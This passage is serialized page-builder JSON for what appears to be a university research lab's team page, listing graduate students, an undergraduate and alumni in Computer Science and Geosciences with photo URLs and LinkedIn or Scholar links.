s\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c84\",\"index\":2,\"id\":\"182-c87\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c88\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c84\",\"index\":1,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c342\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c343\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c342\",\"index\":0,\"id\":\"182-c344\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c342\",\"index\":2,\"id\":\"182-c345\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c342\",\"index\":3,\"id\":\"182-c346\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c342\",\"index\":1,\"id\":\"182-c347\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c348\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c349\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c348\",\"index\":0,\"id\":\"182-c350\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c348\",\"index\":2,\"id\":\"182-c351\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c348\",\"index\":3,\"id\":\"182-c352\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c348\",\"index\":1,\"id\":\"182-c353\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c354\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c355\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c354\",\"index\":0,\"id\":\"182-c356\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c354\",\"index\":2,\"id\":\"182-c357\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c354\",\"index\":3,\"id\":\"182-c358\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c354\",\"index\":1,\"id\":\"182-c359\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c361\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c362\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c361\",\"index\":0,\"id\":\"182-c363\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c361\",\"index\":2,\"id\":\"182-c364\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c361\",\"index\":3,\"id\":\"182-c365\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c361\",\"index\":1,\"id\":\"182-c366\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c367\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c368\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c367\",\"index\":0,\"id\":\"182-c369\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c367\",\"index\":2,\"id\":\"182-c370\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c367\",\"index\":3,\"id\":\"182-c371\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c373\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c374\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c373\",\"index\":0,\"id\":\"182-c375\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c373\",\"index\":2,\"id\":\"182-c376\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c373\",\"index\":3,\"id\":\"182-c377\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c373\",\"index\":1,\"id\":\"182-c378\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c379\",\"parentId\":\"182-c71\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c380\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c379\",\"index\":0,\"id\":\"182-c381\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c379\",\"index\":2,\"id\":\"182-c382\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c379\",\"index\":3,\"id\":\"182-c383\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c379\",\"index\":1,\"id\":\"182-c384\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c98\",\"parentId\":\"182-c97\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c97\",\"parentId\":\"182-c96\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c96\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c169\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c169\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c168\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c177\",\"parentId\":\"182-c176\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c176\",\"parentId\":\"182-c175\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c175\",\"parentId\":\"182-c168\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c256\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c257\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c256\",\"index\":0,\"id\":\"182-c258\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c256\",\"index\":2,\"id\":\"182-c259\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c256\",\"index\":1,\"id\":\"182-c261\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c262\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c263\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c262\",\"index\":0,\"id\":\"182-c264\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c262\",\"index\":2,\"id\":\"182-c265\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c262\",\"index\":1,\"id\":\"182-c267\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c268\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c269\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c268\",\"index\":0,\"id\":\"182-c270\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c268\",\"index\":2,\"id\":\"182-c271\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c268\",\"index\":1,\"id\":\"182-c273\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c274\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c275\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c274\",\"index\":0,\"id\":\"182-c276\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c274\",\"index\":2,\"id\":\"182-c277\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c274\",\"index\":1,\"id\":\"182-c279\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c385\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c386\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c385\",\"index\":0,\"id\":\"182-c387\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c385\",\"index\":2,\"id\":\"182-c388\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c385\",\"index\":1,\"id\":\"182-c389\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c390\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c391\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c390\",\"index\":0,\"id\":\"182-c392\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c390\",\"index\":2,\"id\":\"182-c393\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c390\",\"index\":1,\"id\":\"182-c394\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c395\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c396\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c395\",\"index\":0,\"id\":\"182-c397\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c395\",\"index\":2,\"id\":\"182-c398\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c395\",\"index\":1,\"id\":\"182-c399\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c400\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c401\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c400\",\"index\":0,\"id\":\"182-c402\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c400\",\"index\":2,\"id\":\"182-c403\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c405\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c406\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c405\",\"index\":0,\"id\":\"182-c407\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c405\",\"index\":2,\"id\":\"182-c408\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer 